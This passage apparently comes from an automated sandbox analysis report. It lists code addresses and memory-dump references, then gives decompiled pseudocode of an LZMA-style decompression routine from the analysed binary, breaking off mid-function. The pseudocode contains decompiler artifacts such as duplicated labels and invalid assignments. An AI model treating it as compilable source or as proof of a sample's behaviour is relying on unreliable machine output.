                                                                                                                                                                                                              0x00406d9b
                                                                                                                                                                                                              0x00406d9e
                                                                                                                                                                                                              0x00406da1
                                                                                                                                                                                                              0x00406db7
                                                                                                                                                                                                              0x00406dbc
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df8
                                                                                                                                                                                                              0x00406e24
                                                                                                                                                                                                              0x00406e26
                                                                                                                                                                                                              0x00406e2d
                                                                                                                                                                                                              0x00406e30
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e3a
                                                                                                                                                                                                              0x00406e3d
                                                                                                                                                                                                              0x00406e44
                                                                                                                                                                                                              0x00406e47
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e77
                                                                                                                                                                                                              0x00406e7a
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406e7c
                                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                                              0x00406e85
                                                                                                                                                                                                              0x00406e88
                                                                                                                                                                                                              0x00406e8b
                                                                                                                                                                                                              0x00406e8e
                                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                                              0x00406e94
                                                                                                                                                                                                              0x00406e97
                                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                                              0x00406e9d
                                                                                                                                                                                                              0x00406eb6
                                                                                                                                                                                                              0x00406eb8
                                                                                                                                                                                                              0x00406ebb
                                                                                                                                                                                                              0x00406ebc
                                                                                                                                                                                                              0x00406ebf
                                                                                                                                                                                                              0x00406ec1
                                                                                                                                                                                                              0x00406ec4
                                                                                                                                                                                                              0x00406ec6
                                                                                                                                                                                                              0x00406ec8
                                                                                                                                                                                                              0x00406ecb
                                                                                                                                                                                                              0x00406ecd
                                                                                                                                                                                                              0x00406ed0
                                                                                                                                                                                                              0x00406ed4
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed7
                                                                                                                                                                                                              0x00406eda
                                                                                                                                                                                                              0x00406edd
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406ea7
                                                                                                                                                                                                              0x00406eac
                                                                                                                                                                                                              0x00406eae
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406ee0
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406dfa
                                                                                                                                                                                                              0x00406dfd
                                                                                                                                                                                                              0x00406dff
                                                                                                                                                                                                              0x00406e02
                                                                                                                                                                                                              0x00406e05
                                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                                              0x00406e0a
                                                                                                                                                                                                              0x00406e0d
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e16
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406da3
                                                                                                                                                                                                              0x00406da6
                                                                                                                                                                                                              0x00406da8
                                                                                                                                                                                                              0x00406dab
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0e
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00406b14
                                                                                                                                                                                                              0x00406b17
                                                                                                                                                                                                              0x00406b1a
                                                                                                                                                                                                              0x00406b1d
                                                                                                                                                                                                              0x00406b20
                                                                                                                                                                                                              0x00406b23
                                                                                                                                                                                                              0x00406b26
                                                                                                                                                                                                              0x00406b28
                                                                                                                                                                                                              0x00406b2b
                                                                                                                                                                                                              0x00406b2e
                                                                                                                                                                                                              0x00406b31
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c99
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406ca2
                                                                                                                                                                                                              0x00406ca5
                                                                                                                                                                                                              0x00406ca8
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406cad
                                                                                                                                                                                                              0x00406cb0
                                                                                                                                                                                                              0x00406cb3
                                                                                                                                                                                                              0x00406cb6
                                                                                                                                                                                                              0x00406cb9
                                                                                                                                                                                                              0x00406cbc
                                                                                                                                                                                                              0x00406cbd
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cc2
                                                                                                                                                                                                              0x00406cc5
                                                                                                                                                                                                              0x00406cc8
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406cce
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f16
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f1c
                                                                                                                                                                                                              0x00406f1f
                                                                                                                                                                                                              0x00406f22
                                                                                                                                                                                                              0x00406f25
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f2a
                                                                                                                                                                                                              0x00406f2d
                                                                                                                                                                                                              0x00406f30
                                                                                                                                                                                                              0x00406f33
                                                                                                                                                                                                              0x00406f36
                                                                                                                                                                                                              0x00406f39
                                                                                                                                                                                                              0x00406f3a
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3f
                                                                                                                                                                                                              0x00406f42
                                                                                                                                                                                                              0x00406f45
                                                                                                                                                                                                              0x00406f48
                                                                                                                                                                                                              0x00406f4b
                                                                                                                                                                                                              0x00406f4f
                                                                                                                                                                                                              0x00406f51
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00407189
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bc8

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                                                                                                                                                                              • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406CE2() {
                                                                                                                                                                                                              				unsigned short _t531;
                                                                                                                                                                                                              				signed int _t532;
                                                                                                                                                                                                              				void _t533;
                                                                                                                                                                                                              				signed int _t534;
                                                                                                                                                                                                              				signed int _t535;
                                                                                                                                                                                                              				signed int _t565;
                                                                                                                                                                                                              				signed int _t568;
                                                                                                                                                                                                              				signed int _t589;
                                                                                                                                                                                                              				signed int* _t606;
                                                                                                                                                                                                              				void* _t613;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                                              						 *(_t613 - 0x84) = 0xb;
                                                                                                                                                                                                              						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                                                              						goto L132;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              						L88:
                                                                                                                                                                                                              						 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              						L89:
                                                                                                                                                                                                              						__eax =  *(__ebp - 4);
                                                                                                                                                                                                              						 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                              						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              						L69:
                                                                                                                                                                                                              						 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							L132:
                                                                                                                                                                                                              							 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L133:
                                                                                                                                                                                                              								_t531 =  *_t606;
                                                                                                                                                                                                              								_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                              								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                              								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                              									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                              									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                              									 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                              									_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                              									 *_t606 = _t532;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              									goto L139;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								L137:
                                                                                                                                                                                                              								if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              									 *(_t613 - 0x88) = 5;
                                                                                                                                                                                                              									L170:
                                                                                                                                                                                                              									_t568 = 0x22;
                                                                                                                                                                                                              									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                                              									_t535 = 0;
                                                                                                                                                                                                              									L172:
                                                                                                                                                                                                              									return _t535;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                                              								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								L139:
                                                                                                                                                                                                              								_t533 =  *(_t613 - 0x84);
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										L1:
                                                                                                                                                                                                              										_t534 =  *(_t613 - 0x88);
                                                                                                                                                                                                              										if(_t534 > 0x1c) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              											case 0:
                                                                                                                                                                                                              												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              												_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                                                              												if(_t534 > 0xe1) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                              												_push(0x2d);
                                                                                                                                                                                                              												asm("cdq");
                                                                                                                                                                                                              												_pop(_t570);
                                                                                                                                                                                                              												_push(9);
                                                                                                                                                                                                              												_pop(_t571);
                                                                                                                                                                                                              												_t609 = _t538 / _t570;
                                                                                                                                                                                                              												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                                              												asm("cdq");
                                                                                                                                                                                                              												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                                              												 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                                              												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                                              												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                                              												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                                              												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                                              													L10:
                                                                                                                                                                                                              													if(_t612 == 0) {
                                                                                                                                                                                                              														L12:
                                                                                                                                                                                                              														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                                              														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              														goto L15;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L11;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													do {
                                                                                                                                                                                                              														L11:
                                                                                                                                                                                                              														_t612 = _t612 - 1;
                                                                                                                                                                                                              														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                                              													} while (_t612 != 0);
                                                                                                                                                                                                              													goto L12;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												if( *(_t613 - 4) != 0) {
                                                                                                                                                                                                              													GlobalFree( *(_t613 - 4));
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              												 *(_t613 - 4) = _t534;
                                                                                                                                                                                                              												if(_t534 == 0) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                                              													goto L10;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 1:
                                                                                                                                                                                                              												L13:
                                                                                                                                                                                                              												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                              												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(_t613 - 0x88) = 1;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                                              												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              												_t45 = _t613 - 0x48;
                                                                                                                                                                                                              												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                                              												__eflags =  *_t45;
                                                                                                                                                                                                              												L15:
                                                                                                                                                                                                              												if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                                              													goto L13;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t546 =  *(_t613 - 0x40);
                                                                                                                                                                                                              												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                                              													L20:
                                                                                                                                                                                                              													 *(_t613 - 0x48) = 5;
                                                                                                                                                                                                              													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              													goto L23;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t613 - 0x74) = _t546;
                                                                                                                                                                                                              												if( *(_t613 - 8) != 0) {
                                                                                                                                                                                                              													GlobalFree( *(_t613 - 8));
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                                              												 *(_t613 - 8) = _t534;
                                                                                                                                                                                                              												if(_t534 == 0) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L20;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 2:
                                                                                                                                                                                                              												L24:
                                                                                                                                                                                                              												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                                              												 *(_t613 - 0x84) = 6;
                                                                                                                                                                                                              												 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                                                              												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                              												L132:
                                                                                                                                                                                                              												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              												goto L133;
                                                                                                                                                                                                              											case 3:
                                                                                                                                                                                                              												L21:
                                                                                                                                                                                                              												__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                              												if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(_t613 - 0x88) = 3;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              												_t67 = _t613 - 0x70;
                                                                                                                                                                                                              												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              												__eflags =  *_t67;
                                                                                                                                                                                                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L23:
                                                                                                                                                                                                              												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                                              												if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                                              													goto L21;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												goto L24;
                                                                                                                                                                                                              											case 4:
                                                                                                                                                                                                              												L133:
                                                                                                                                                                                                              												_t531 =  *_t606;
                                                                                                                                                                                                              												_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                              												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                              												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                              													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                              													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                              													 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                              													_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                              													 *_t606 = _t532;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L139;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 5:
                                                                                                                                                                                                              												goto L137;
                                                                                                                                                                                                              											case 6:
                                                                                                                                                                                                              												__edx = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              													 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														L132:
                                                                                                                                                                                                              														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              														goto L133;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              												__cl = 8;
                                                                                                                                                                                                              												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                              													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              														_t98 = __ebp - 0x38;
                                                                                                                                                                                                              														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              														__eflags =  *_t98;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                              												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													__ebx = 1;
                                                                                                                                                                                                              													goto L61;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													__ebx = 1;
                                                                                                                                                                                                              													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              													goto L41;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 7:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              													 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              													__eax = 0;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              													__al = __al & 0x000000fd;
                                                                                                                                                                                                              													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              													goto L69;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L132:
                                                                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 8:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
